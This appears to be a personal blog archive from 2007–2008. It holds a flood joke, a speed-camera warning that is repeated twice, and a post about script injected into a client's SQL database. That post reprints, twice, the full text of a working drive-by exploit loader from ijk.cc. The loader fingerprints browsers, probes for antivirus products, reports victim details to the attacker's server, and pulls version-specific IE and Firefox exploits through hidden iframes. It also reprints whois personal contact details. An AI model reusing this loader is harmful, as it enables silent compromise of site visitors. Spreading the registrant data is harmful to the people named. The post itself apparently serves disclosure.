Someone said this on the comments section of Digg. I'm not a religious person by any means, but I think it's a great message.
It was flooding in California. As the flood waters were rising, a man was on the stoop of his house and another man in a row boat came by. The man in the row boat told the man on the stoop to get in and he'd save him. The man on the stoop said, no, he had faith in God and would wait for God to save him. The flood waters kept rising and the man had to go to the second floor of his house. A man in a motor boat came by and told the man in the house to get in because he had come to rescue him. The man in the house said no thank you. He had perfect faith in God and would wait for God to save him. The flood waters kept rising. Pretty soon they were up to the man's roof and he got out on the roof. A helicopter then came by, lowered a rope and the pilot shouted down in the man in the house to climb up the rope because the helicopeter had come to rescue him. The man in the house wouldn't get in. He told the pilot that he had faith in God and would wait for God to rescue him. The flood waters kept rising and the man in the house drowned. When he got to heaven, he asked God where he went wrong. He told God that he had perfect faith in God, but God had let him drown.
"What more do you want from me?" asked God. "I sent you two boats and a helicopter."
Thursday, March 27, 2008
Wednesday, March 19, 2008
More Hands In Our Pockets - Point To Point Speed Cameras On Tollways
ITS UP AN RUNNING, SO BE WARNED
New Legislation M5 & M7 Re Speeding Fines
M5 and the M7 are now equipped with Point to Point Speed Devices. On entering the M7 the etag beeps and a camera takes a photo of your car recording the exact time. On exiting the etag system beeps again another camera at that point takes a photo of the car and the time. Then the computer calculates the time it has taken you to travel between the two points and calculates your speed. If you completed the clocked journey too fast you are issued with a speeding ticket.
At the present the speed limit is 100K.P.H. with a tolerance of 102 maximum. Over that and you are issued with a fine automatically. What a shock some drivers are going to have when they use this roadway for a week and get a weeks' tickets BOTH WAYS. Of course your license will also be recalled for 3 months. Now with the new legislation, fighting a Speed Camera fine is almost impossible. You must prove the device is faulty and if you are not a technician working on them, you have no chance of beating the fine. The Pacific Highway has a set and these are recognized by large steel frames over the lanes with a speed camera and some distance up the road is another large metal frame with a speed camera. These new point to point systems are being put onto any expressway and highway where vehicles are not able to exit between those points.
NOTE: School zone cameras are not speed tolerant. Anything over, even 41, is a fine.
New Legislation M5 & M7 Re Speeding Fines
M5 and the M7 are now equipped with Point to Point Speed Devices. On entering the M7 the etag beeps and a camera takes a photo of your car recording the exact time. On exiting the etag system beeps again another camera at that point takes a photo of the car and the time. Then the computer calculates the time it has taken you to travel between the two points and calculates your speed. If you completed the clocked journey too fast you are issued with a speeding ticket.
At the present the speed limit is 100K.P.H. with a tolerance of 102 maximum. Over that and you are issued with a fine automatically. What a shock some drivers are going to have when they use this roadway for a week and get a weeks' tickets BOTH WAYS. Of course your license will also be recalled for 3 months. Now with the new legislation, fighting a Speed Camera fine is almost impossible. You must prove the device is faulty and if you are not a technician working on them, you have no chance of beating the fine. The Pacific Highway has a set and these are recognized by large steel frames over the lanes with a speed camera and some distance up the road is another large metal frame with a speed camera. These new point to point systems are being put onto any expressway and highway where vehicles are not able to exit between those points.
NOTE: School zone cameras are not speed tolerant. Anything over, even 41, is a fine.
Tuesday, August 07, 2007
Hackers Injecting Script tags into SQL data fields
Recently, on one of my clients sites, I noticed that some hacker scum had placed a script tag on some of the pages of the site by hacking into the SQL database and inserting the said script tag into a data field. This means that when the page is loaded, the script is also loaded.
The location of the script that is referred to is:
http://ijk.cc
The whois information for ijk.cc is:
Registrant:
robert kuphal
102 Greer Drive
Brunswick, GA 31520
US
Email: phu59@aol.com
Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: ijk.cc
Created on..............: Fri, Oct 27, 2006
Expires on..............: Sat, Oct 27, 2007
Record last updated on..: Sun, Dec 24, 2006
Administrative Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
Technical Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
DNS Servers:
ns82.websitewelcome.com
ns81.websitewelcome.com
The actual script that is at this locations is as follows:
// build: Fri Dec 29 07:37:24 2006
var debug=0;
var test_mode=0;
var cookie_name="userid1";
var cookie_value="11"; // increment it after each exploits update
var server_addr="ijk.cc";
var av_num_errs = 0, av_num_ready = 0, av_finished = 0;
var user_agent = "";
var os_version = 0;
var ie_version = 0, ie_build = 0, wmp_build = 0, av_id = 0;
var system_id = "none";
function print_dbg(str)
{
if (debug) {
document.writeln(str+"
");
}
}
function dbg_alert(str)
{
if (debug) {
alert(str);
}
}
function GetCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
if (!dc) {
print_dbg("Cookies not set!");
return null;
}
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
print_dbg(prefix + " not found in cookie");
return null;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}
function SetCookie(name, value, domain) {
var exp = new Date();
var two_years = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(two_years);
var curCookie = name + "=" + escape(value) + "; expires=" + exp.toGMTString();
document.cookie = curCookie;
print_dbg("Cookie ["+curCookie+"] set ok");
}
function GetUserAgent()
{
if (navigator.userAgent.indexOf("Opera") == -1 &&
navigator.userAgent.indexOf("Firefox") == -1 &&
navigator.userAgent.indexOf("MSIE") != -1 &&
navigator.userAgent.indexOf("Windows") != -1) {
return "ie";
}
if (navigator.userAgent.indexOf("Firefox") != -1) {
return "firefox";
}
if (navigator.userAgent.indexOf("Opera") != -1) {
return "opera";
}
return "unknown";
}
function GetIEBuild()
{
var fa, full_ver;
var ver_num;
oClientCaps = document.createElement("DIV");
oClientCaps.id = "oClientCaps";
oClientCaps.addBehavior("#default#clientCaps");
document.body.appendChild(oClientCaps);
full_ver = oClientCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
fa = full_ver.split(",");
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
return build_num;
}
function GetIEVersion()
{
var fa, full_ver;
var ver_num;
full_ver = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
fa = full_ver.split(",");
ver_num = parseInt(fa[0]) * 100 + parseInt(fa[1]);
return ver_num;
}
function GetWMPBuild()
{
var fa;
if (!oClientCaps.isComponentInstalled("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}", "ComponentID")) {
print_dbg("WMP not installed");
return 0;
}
full_ver = oClientCaps.getComponentVersion ("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}","componentid");
fa = full_ver.split(",");
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
print_dbg(fa[0]+"."+fa[1]+"."+fa[2]+"."+ fa[3]);
return build_num;
}
function GetFirefoxVersion()
{
var found_ar, fa;
var ver_str = "", ver_num = 0;
re = /\sFirefox\/([\d\.]+)\b/;
found_ar = re.exec(navigator.userAgent);
if (!found_ar) {
print_dbg("regexp failed");
return 0;
}
fa = found_ar[1].split(".");
ver_num = (parseInt(fa[0]) * 1000000) + (parseInt(fa[1]) * 10000);
if (fa.length > 2) {
ver_num += parseInt(fa[2]) * 100;
}
if (fa.length > 3) {
ver_num += parseInt(fa[3]);
}
print_dbg("Firefox version: [" + ver_num + "]");
return ver_num;
}
function GetOSVersion()
{
var found_ar;
var os_ver = 0;
re = /Windows\sNT\s(\d)\.(\d)/;
found_ar = re.exec(navigator.userAgent);
if (!found_ar) {
return 0;
}
os_ver = parseInt(found_ar[1]) * 10 + parseInt(found_ar[2]);
//print_dbg("OS Version: [" + os_ver + "]");
return os_ver;
}
function ExecScript(script_src)
{
var st = document.getElementById('script1');
st.src = script_src;
return true;
}
function ExecIframe(iframe_src)
{
var iframe = document.getElementById('iframe1');
iframe.src = iframe_src;
return true;
}
///// EXPS
//
function exp_iscomponentinstalled()
{
print_dbg("Loading exp_iscomponentinstalled() for SP0");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/isci/isci_my.js");
}
// Firefox compareto
//
function exp_ff104()
{
print_dbg("Loading exp_ff104()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/ff104/ff104.js");
}
// Firefox navigator java
//
function exp_ff154()
{
print_dbg("Loading exp_ff154()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/ff154/ff154.js");
}
// Windows 2000, IE 5.x
//
function exp_ms06_044()
{
print_dbg("Loading exp_ms06_044()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';
// var my_src = "ww.js"
var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27'+my_src+'%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = url;
// ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');
}
function exp_vml()
{
print_dbg("Loading vml_exp()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecIframe('http://'+server_addr+'/E/vml/vml.htm');
}
/////////// End of EXPS /////////////////
///////////////////////////////////////////////////////
function NotifyServerStart()
{
url = "http://"+server_addr+"/cgi-bin/jl/jloader.pl?source="+
location.hostname+"&system_id="+system_id;
if (user_agent == "ie") {
url = url+"&iebuild="+ie_build+"&wmpbuild="+wmp_build+"&av_id="+av_id;
}
print_dbg("===>>> notify: user_agent=["+user_agent+"] url=["+url+"]");
try {
var sl = document.getElementById('serv_note_link');
sl.src = url;
// serv_note_link.src = url;
} catch (e) {
print_dbg("Cannot find element id=serv_note_link");
};
}
progs=['NAVCfgWizDll.NAVCfgWizMgr', // 1 NAV
'McGDMgr.DwnldGroupMgr']; // 2 McAfee
cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4', // 3 trendmicro
'091EB208-39DD-417D-A5DD-7E2C2D8FB9CB', // 4 Windows Defender
'D653647D-D607-4DF6-A5B8-48D2BA195F7B', // 5 BitDefender Antivirus
'9F97547E-4609-42C5-AE0C-81C61FFAEBC3', // 6 AVG7
'65756541-C65C-11CD-0000-4B656E696100', // 7 Panda Antivirus
'1474F601-9B4B-4EB0-81FA-20F753C0E1A4', // 8 F-Prot
'D5507020-DB45-11d1-A5F0-00600872F78D', // 9 Norman Virus Control
'DD230880-495A-11D1-B064-008048EC2FC5', // 10 Kaspersky
'B089FE88-FB52-11D3-BDF1-0050DA34150D', // 11 Nod32
'472083B0-C522-11CF-8763-00608CC02F24', // 12 Avast
'45AC2688-0253-4ED8-97DE-B5370FA7D48A', // 13 Antivir
'8934FCEF-F5B8-468F-951F-78A921CD3920', // 14 Ewido
'1EB2409C-6E28-4066-9738-97A1B8F5639C', // 15 ??
'E7593602-124B-47C9-9F73-A69308EDC973', // 16 Dr Web
'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32
function av_err_event(i) {
av_num_errs++;
cids[i] = null;
}
function av_ready_event(i) {
var str = "ready: "+cids[i];
av_num_ready++;
if (av_finished) {
return;
}
if (cids[i] != null) {
var str = "av_redy_event(): Antivirus found: "+cids[i]+"!";
av_id = progs.length + i + 1;
av_finished = 1;
dbg_alert("av_redy_event(): Antivirus found: "+cids[i]+"!");
// jl_main2();
}
}
// Return:
// 1 - antivirus found
// 0 - operation in progress
//
function StartCheckAV()
{
var txt = "";
try {
var num_errs = 0;
print_dbg("Start check progs...");
for (i = 0; i < progs.length && !av_id; i++) {
try {
print_dbg("Checking "+progs[i]+"...");
new ActiveXObject(progs[i]);
print_dbg("Antivirus installed: " + progs[i]);
av_id = i + 1;
av_finished = 1;
}
catch (e) {};
}
if (av_id) {
print_dbg("Antivirus detected av_id="+av_id+" (progs)!");
return 1;
}
print_dbg("Start check antivirus CLSIDs");
for (i = 0; i < cids.length; i++) {
print_dbg("Creating "+cids[i]+"...");
txt += '<'+'/object>';
}
document.createElement('div').innerHTML = txt;
} catch (e) {};
if (av_id) {
print_dbg("Antivirus detected av_id="+av_id+"(cids, before callbacks)!");
return 1;
}
return 0;
}
function jl_main()
{
// dbg_alert("jl_main() started!");
if (!debug) {
try {
if (GetCookie(cookie_name) == cookie_value) {
print_dbg("Est kuka!");
return false;
}
SetCookie(cookie_name, cookie_value);
} catch (e) {};
}
// Get OS and browser versions
//
os_version = GetOSVersion();
user_agent = GetUserAgent();
// document.writeln("[Photo]");
var tmp_img = document.createElement("IMG");
tmp_img.id = "serv_note_link";
tmp_img.width = 0;
tmp_img.height = 0;
tmp_img.border = 0;
tmp_img.frameborder = 0;
tmp_img.src = "about:blank";
document.body.appendChild(tmp_img);
var iframe1 = document.createElement("IFRAME");
iframe1.id = "iframe1";
iframe1.border = 0;
iframe1.frameborder = 0;
iframe1.width = 0;
iframe1.height = 0;
document.body.appendChild(iframe1);
// document.writeln("");
var script1 = document.createElement("SCRIPT");
script1.id = "script1";
document.body.appendChild(script1);
// document.writeln("");
print_dbg("OS Version: NT " + os_version);
print_dbg("Browser: " + user_agent);
// Internet Explorer
//
if (user_agent == "ie") {
// Must do GetIEBuild() first!
//
ie_build = GetIEBuild();
ie_version = GetIEVersion();
wmp_build = GetWMPBuild();
print_dbg("IE version: [" + ie_version + "]");
print_dbg("IE build: [" + ie_build + "]");
print_dbg("WMP build: [" + wmp_build + "]");
// IE 7.x
//
if (ie_version >= 700) {
system_id = "ie7";
} else if (ie_version >= 600) {
// IE 6.x
//
print_dbg("IE " + ie_version + " ");
if (os_version == 50) {
// Windows 2000
//
print_dbg("Win 2000 IE6");
system_id = "ie6_2k";
} else if (os_version == 51) {
// Windows XP
//
if (ie_build >= 60029002180) {
print_dbg("Win XP SP2");
system_id = "ie6_xpsp2";
} else if (ie_build >= 60028001106) {
print_dbg("Win XP SP1");
system_id = "ie6_xpsp1";
} else if (ie_build == 60026000000) {
print_dbg("Win XP SP0");
system_id = "ie6_xpsp0";
} else {
system_id = "ie6_xp";
print_dbg("Win XP SP unknown: " + ie_build);
}
} else {
// TODO: Support for 98, NT, Win2003, Vista
//
print_dbg("Win unsupported " + os_version);
system_id = "ie6_unknown";
}
} else if (ie_version < 600) {
// IE 5.x
//
print_dbg("IE " + ie_version + " ");
if (os_version == 50) {
// MSIE 5, Windows 2000
//
print_dbg("Win 2000");
system_id = "ie5_2k";
} else if (os_version < 50) {
print_dbg("Win NT " + os_version);
system_id = "ie5_nt";
}
}
StartCheckAV();
}
// Mozilla Firefox
//
if (user_agent == "firefox" && os_version != 0) {
var firefox_version = 0;
firefox_version = GetFirefoxVersion();
// Version <= 1.0.4
if (firefox_version <= 1000400) {
system_id = "ff104";
}
// 1.0.4 < Version < 1.5.0.4
if (firefox_version > 1000400 && firefox_version <= 1050004) {
system_id = "ff150";
}
}
jl_main2();
}
function set_window_status(stat_str)
{
window.status = stat_str;
}
function jl_main2()
{
av_finished = 1;
// print_dbg("av_on="+av_on);
NotifyServerStart();
set_window_status("Opening "+window.location.href+"...");
setTimeout("set_window_status('Done')", 5000);
print_dbg("system_id: "+system_id+" av_id="+av_id+" user_agent="+user_agent);
switch (system_id) {
case "ie7":
case "ie6_xp":
case "ie6_unknown":
case "ie6_xpsp2":
exp_vml();
break;
case "ie6_xpsp1":
exp_vml();
break;
case "ie6_xpsp0":
exp_iscomponentinstalled();
break;
case "ie6_2k":
exp_vml();
break;
case "ie5_2k":
exp_ms06_044();
break;
case "ie5_nt":
break;
case "ff104":
exp_ff104();
break;
case "ff150":
exp_ff154();
break;
default:
break;
}
// setTimeout('NotifyServerFinish()', 2000);
}
//jl_main();
// Run main function only after dom loaded
/* for Mozilla */
if (document.addEventListener) {
document.addEventListener("DOMContentLoaded", jl_main, false);
} else {
// IE
document.write("<"+"/script>");
}
I will be giving Mr Robert Kuphal of Brunswick, Georgia, USA a call to ask him why a link to a script hosted on his domain has been illegally inserted into the SQL database of the site.
The location of the script that is referred to is:
http://ijk.cc
The whois information for ijk.cc is:
Registrant:
robert kuphal
102 Greer Drive
Brunswick, GA 31520
US
Email: phu59@aol.com
Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: ijk.cc
Created on..............: Fri, Oct 27, 2006
Expires on..............: Sat, Oct 27, 2007
Record last updated on..: Sun, Dec 24, 2006
Administrative Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
Technical Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
DNS Servers:
ns82.websitewelcome.com
ns81.websitewelcome.com
The actual script that is at this locations is as follows:
// build: Fri Dec 29 07:37:24 2006
var debug=0;
var test_mode=0;
var cookie_name="userid1";
var cookie_value="11"; // increment it after each exploits update
var server_addr="ijk.cc";
var av_num_errs = 0, av_num_ready = 0, av_finished = 0;
var user_agent = "";
var os_version = 0;
var ie_version = 0, ie_build = 0, wmp_build = 0, av_id = 0;
var system_id = "none";
function print_dbg(str)
{
if (debug) {
document.writeln(str+"
");
}
}
function dbg_alert(str)
{
if (debug) {
alert(str);
}
}
function GetCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
if (!dc) {
print_dbg("Cookies not set!");
return null;
}
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
print_dbg(prefix + " not found in cookie");
return null;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}
function SetCookie(name, value, domain) {
var exp = new Date();
var two_years = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(two_years);
var curCookie = name + "=" + escape(value) + "; expires=" + exp.toGMTString();
document.cookie = curCookie;
print_dbg("Cookie ["+curCookie+"] set ok");
}
function GetUserAgent()
{
if (navigator.userAgent.indexOf("Opera") == -1 &&
navigator.userAgent.indexOf("Firefox") == -1 &&
navigator.userAgent.indexOf("MSIE") != -1 &amp;&
navigator.userAgent.indexOf("Windows") != -1) {
return "ie";
}
if (navigator.userAgent.indexOf("Firefox") != -1) {
return "firefox";
}
if (navigator.userAgent.indexOf("Opera") != -1) {
return "opera";
}
return "unknown";
}
function GetIEBuild()
{
var fa, full_ver;
var ver_num;
oClientCaps = document.createElement("DIV");
oClientCaps.id = "oClientCaps";
oClientCaps.addBehavior("#default#clientCaps");
document.body.appendChild(oClientCaps);
full_ver = oClientCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
fa = full_ver.split(",");
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
return build_num;
}
function GetIEVersion()
{
var fa, full_ver;
var ver_num;
full_ver = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
fa = full_ver.split(",");
ver_num = parseInt(fa[0]) * 100 + parseInt(fa[1]);
return ver_num;
}
function GetWMPBuild()
{
var fa;
if (!oClientCaps.isComponentInstalled("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}", "ComponentID")) {
print_dbg("WMP not installed");
return 0;
}
full_ver = oClientCaps.getComponentVersion ("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}","componentid");
fa = full_ver.split(",");
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
print_dbg(fa[0]+"."+fa[1]+"."+fa[2]+"."+ fa[3]);
return build_num;
}
function GetFirefoxVersion()
{
var found_ar, fa;
var ver_str = "", ver_num = 0;
re = /\sFirefox\/([\d\.]+)\b/;
found_ar = re.exec(navigator.userAgent);
if (!found_ar) {
print_dbg("regexp failed");
return 0;
}
fa = found_ar[1].split(".");
ver_num = (parseInt(fa[0]) * 1000000) + (parseInt(fa[1]) * 10000);
if (fa.length > 2) {
ver_num += parseInt(fa[2]) * 100;
}
if (fa.length > 3) {
ver_num += parseInt(fa[3]);
}
print_dbg("Firefox version: [" + ver_num + "]");
return ver_num;
}
function GetOSVersion()
{
var found_ar;
var os_ver = 0;
re = /Windows\sNT\s(\d)\.(\d)/;
found_ar = re.exec(navigator.userAgent);
if (!found_ar) {
return 0;
}
os_ver = parseInt(found_ar[1]) * 10 + parseInt(found_ar[2]);
//print_dbg("OS Version: [" + os_ver + "]");
return os_ver;
}
function ExecScript(script_src)
{
var st = document.getElementById('script1');
st.src = script_src;
return true;
}
function ExecIframe(iframe_src)
{
var iframe = document.getElementById('iframe1');
iframe.src = iframe_src;
return true;
}
///// EXPS
//
function exp_iscomponentinstalled()
{
print_dbg("Loading exp_iscomponentinstalled() for SP0");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/isci/isci_my.js");
}
// Firefox compareto
//
function exp_ff104()
{
print_dbg("Loading exp_ff104()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/ff104/ff104.js");
}
// Firefox navigator java
//
function exp_ff154()
{
print_dbg("Loading exp_ff154()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/ff154/ff154.js");
}
// Windows 2000, IE 5.x
//
function exp_ms06_044()
{
print_dbg("Loading exp_ms06_044()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';
// var my_src = "ww.js"
var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27'+my_src+'%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = url;
// ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');
}
function exp_vml()
{
print_dbg("Loading vml_exp()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecIframe('http://'+server_addr+'/E/vml/vml.htm');
}
/////////// End of EXPS /////////////////
///////////////////////////////////////////////////////
function NotifyServerStart()
{
url = "http://"+server_addr+"/cgi-bin/jl/jloader.pl?source="+
location.hostname+"&system_id="+system_id;
if (user_agent == "ie") {
url = url+"&iebuild="+ie_build+"&wmpbuild="+wmp_build+"&av_id="+av_id;
}
print_dbg("===>>> notify: user_agent=["+user_agent+"] url=["+url+"]");
try {
var sl = document.getElementById('serv_note_link');
sl.src = url;
// serv_note_link.src = url;
} catch (e) {
print_dbg("Cannot find element id=serv_note_link");
};
}
progs=['NAVCfgWizDll.NAVCfgWizMgr', // 1 NAV
'McGDMgr.DwnldGroupMgr']; // 2 McAfee
cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4', // 3 trendmicro
'091EB208-39DD-417D-A5DD-7E2C2D8FB9CB', // 4 Windows Defender
'D653647D-D607-4DF6-A5B8-48D2BA195F7B', // 5 BitDefender Antivirus
'9F97547E-4609-42C5-AE0C-81C61FFAEBC3', // 6 AVG7
'65756541-C65C-11CD-0000-4B656E696100', // 7 Panda Antivirus
'1474F601-9B4B-4EB0-81FA-20F753C0E1A4', // 8 F-Prot
'D5507020-DB45-11d1-A5F0-00600872F78D', // 9 Norman Virus Control
'DD230880-495A-11D1-B064-008048EC2FC5', // 10 Kaspersky
'B089FE88-FB52-11D3-BDF1-0050DA34150D', // 11 Nod32
'472083B0-C522-11CF-8763-00608CC02F24', // 12 Avast
'45AC2688-0253-4ED8-97DE-B5370FA7D48A', // 13 Antivir
'8934FCEF-F5B8-468F-951F-78A921CD3920', // 14 Ewido
'1EB2409C-6E28-4066-9738-97A1B8F5639C', // 15 ??
'E7593602-124B-47C9-9F73-A69308EDC973', // 16 Dr Web
'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32
function av_err_event(i) {
av_num_errs++;
cids[i] = null;
}
function av_ready_event(i) {
var str = "ready: "+cids[i];
av_num_ready++;
if (av_finished) {
return;
}
if (cids[i] != null) {
var str = "av_redy_event(): Antivirus found: "+cids[i]+"!";
av_id = progs.length + i + 1;
av_finished = 1;
dbg_alert("av_redy_event(): Antivirus found: "+cids[i]+"!");
// jl_main2();
}
}
// Return:
// 1 - antivirus found
// 0 - operation in progress
//
function StartCheckAV()
{
var txt = "";
try {
var num_errs = 0;
print_dbg("Start check progs...");
for (i = 0; i < progs.length && !av_id; i++) {
try {
print_dbg("Checking "+progs[i]+"...");
new ActiveXObject(progs[i]);
print_dbg("Antivirus installed: " + progs[i]);
av_id = i + 1;
av_finished = 1;
}
catch (e) {};
}
if (av_id) {
print_dbg("Antivirus detected av_id="+av_id+" (progs)!");
return 1;
}
print_dbg("Start check antivirus CLSIDs");
for (i = 0; i < cids.length; i++) {
print_dbg("Creating "+cids[i]+"...");
txt += '<'+'/object>';
}
document.createElement('div').innerHTML = txt;
} catch (e) {};
if (av_id) {
print_dbg("Antivirus detected av_id="+av_id+"(cids, before callbacks)!");
return 1;
}
return 0;
}
function jl_main()
{
// dbg_alert("jl_main() started!");
if (!debug) {
try {
if (GetCookie(cookie_name) == cookie_value) {
print_dbg("Est kuka!");
return false;
}
SetCookie(cookie_name, cookie_value);
} catch (e) {};
}
// Get OS and browser versions
//
os_version = GetOSVersion();
user_agent = GetUserAgent();
// document.writeln("[Photo]");
var tmp_img = document.createElement("IMG");
tmp_img.id = "serv_note_link";
tmp_img.width = 0;
tmp_img.height = 0;
tmp_img.border = 0;
tmp_img.frameborder = 0;
tmp_img.src = "about:blank";
document.body.appendChild(tmp_img);
var iframe1 = document.createElement("IFRAME");
iframe1.id = "iframe1";
iframe1.border = 0;
iframe1.frameborder = 0;
iframe1.width = 0;
iframe1.height = 0;
document.body.appendChild(iframe1);
// document.writeln("");
var script1 = document.createElement("SCRIPT");
script1.id = "script1";
document.body.appendChild(script1);
// document.writeln("");
print_dbg("OS Version: NT " + os_version);
print_dbg("Browser: " + user_agent);
// Internet Explorer
//
if (user_agent == "ie") {
// Must do GetIEBuild() first!
//
ie_build = GetIEBuild();
ie_version = GetIEVersion();
wmp_build = GetWMPBuild();
print_dbg("IE version: [" + ie_version + "]");
print_dbg("IE build: [" + ie_build + "]");
print_dbg("WMP build: [" + wmp_build + "]");
// IE 7.x
//
if (ie_version >= 700) {
system_id = "ie7";
} else if (ie_version >= 600) {
// IE 6.x
//
print_dbg("IE " + ie_version + " ");
if (os_version == 50) {
// Windows 2000
//
print_dbg("Win 2000 IE6");
system_id = "ie6_2k";
} else if (os_version == 51) {
// Windows XP
//
if (ie_build >= 60029002180) {
print_dbg("Win XP SP2");
system_id = "ie6_xpsp2";
} else if (ie_build >= 60028001106) {
print_dbg("Win XP SP1");
system_id = "ie6_xpsp1";
} else if (ie_build == 60026000000) {
print_dbg("Win XP SP0");
system_id = "ie6_xpsp0";
} else {
system_id = "ie6_xp";
print_dbg("Win XP SP unknown: " + ie_build);
}
} else {
// TODO: Support for 98, NT, Win2003, Vista
//
print_dbg("Win unsupported " + os_version);
system_id = "ie6_unknown";
}
} else if (ie_version < 600) {
// IE 5.x
//
print_dbg("IE " + ie_version + " ");
if (os_version == 50) {
// MSIE 5, Windows 2000
//
print_dbg("Win 2000");
system_id = "ie5_2k";
} else if (os_version < 50) {
print_dbg("Win NT " + os_version);
system_id = "ie5_nt";
}
}
StartCheckAV();
}
// Mozilla Firefox
//
if (user_agent == "firefox" && os_version != 0) {
var firefox_version = 0;
firefox_version = GetFirefoxVersion();
// Version <= 1.0.4
if (firefox_version <= 1000400) {
system_id = "ff104";
}
// 1.0.4 < Version < 1.5.0.4
if (firefox_version > 1000400 && firefox_version <= 1050004) {
system_id = "ff150";
}
}
jl_main2();
}
function set_window_status(stat_str)
{
window.status = stat_str;
}
function jl_main2()
{
av_finished = 1;
// print_dbg("av_on="+av_on);
NotifyServerStart();
set_window_status("Opening "+window.location.href+"...");
setTimeout("set_window_status('Done')", 5000);
print_dbg("system_id: "+system_id+" av_id="+av_id+" user_agent="+user_agent);
switch (system_id) {
case "ie7":
case "ie6_xp":
case "ie6_unknown":
case "ie6_xpsp2":
exp_vml();
break;
case "ie6_xpsp1":
exp_vml();
break;
case "ie6_xpsp0":
exp_iscomponentinstalled();
break;
case "ie6_2k":
exp_vml();
break;
case "ie5_2k":
exp_ms06_044();
break;
case "ie5_nt":
break;
case "ff104":
exp_ff104();
break;
case "ff150":
exp_ff154();
break;
default:
break;
}
// setTimeout('NotifyServerFinish()', 2000);
}
//jl_main();
// Run main function only after dom loaded
/* for Mozilla */
if (document.addEventListener) {
document.addEventListener("DOMContentLoaded", jl_main, false);
} else {
// IE
document.write("<"+"/script>");
}
I will be giving Mr Robert Kuphal of Brunswick, Georgia, USA a call to ask him why a link to a script hosted on his domain has been illegally inserted into the SQL database of the site.
Subscribe to:
Posts (Atom)